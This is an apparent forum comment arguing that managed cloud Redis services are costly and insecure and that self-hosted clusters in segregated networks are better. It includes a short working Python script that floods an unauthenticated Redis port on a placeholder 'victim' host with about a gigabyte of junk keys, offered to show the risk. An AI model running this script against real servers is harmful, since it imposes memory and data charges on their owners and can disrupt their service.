It's a "solution" in the same vein as Azure Cosmos DB: yes, you can write less code/config to get the benefits of a cached front end on a DB, but my god you will pay hand over fist if you actually use it on any meaningful project.
Do a cost analysis and it will be a lot cheaper to cluster a bunch of mid-level VMs into a Redis service than it is to use any of the cloud providers' managed Redis offerings, with the added advantage that you can house it in its own segregated vnet to overcome the insanely permissive default security settings (Redis's security sucks; you know it's bad when Access did it better and you wish for the "maturity and sensibleness" of MySQL </sarcasm>), unlike the managed offerings, which expose standard ports and act as a beacon for miscreants scanning with Shodan. All it would take is an S3-style "forgot to secure it" snafu, half a dozen lines of Python, and a few hundred KB of data written to enumerated keys, and you're looking at being liable for unlimited data charges; it would make 4G roaming data charges look cheap.
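To put a rough number on "half a dozen lines of Python": a minimal sketch of what writing junk to enumerated keys on an exposed, unauthenticated Redis port looks like. The hostname, key prefix, and payload size are all made up for illustration; it speaks raw RESP over a socket, so it doesn't even need a client library installed.

```python
# Sketch only: hammering an open Redis port with enumerated keys.
# "victim.example.com", "junk:*" and the 100 KB payload are hypothetical.
import socket


def resp_set(key: str, value: bytes) -> bytes:
    """Encode a Redis SET command as a RESP array of bulk strings."""
    parts = [b"SET", key.encode(), value]
    out = b"*%d\r\n" % len(parts)
    for p in parts:
        out += b"$%d\r\n%s\r\n" % (len(p), p)
    return out


if __name__ == "__main__":
    payload = b"x" * 100_000  # ~100 KB per key
    with socket.create_connection(("victim.example.com", 6379)) as s:
        for i in range(10_000):  # enumerated keys: junk:0, junk:1, ...
            s.sendall(resp_set(f"junk:{i}", payload))
```

That's a gigabyte of someone else's memory and egress bill in a for-loop, which is the whole point: a segregated vnet means this traffic never reaches the port in the first place.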
Never mind that all this new service offers is what is already possible using Redis modules, as the article states. The fact it's Redis "compatible" fills me with dread, as it makes me think proprietary data structures will come, which means you're going to be stuck with it until they mothball it, and then what?...
Given the number of off-the-shelf Redis Kubernetes cluster solutions available, if your data project is truly in need of distributed transaction logging, you would be better off, in my opinion, investing in the skills to run a cluster, maintain (sorta) portability between cloud vendors, and build out your own bespoke solution. It will be cheaper (in both service and data costs) and a less compromised jack-of-all-trades solution.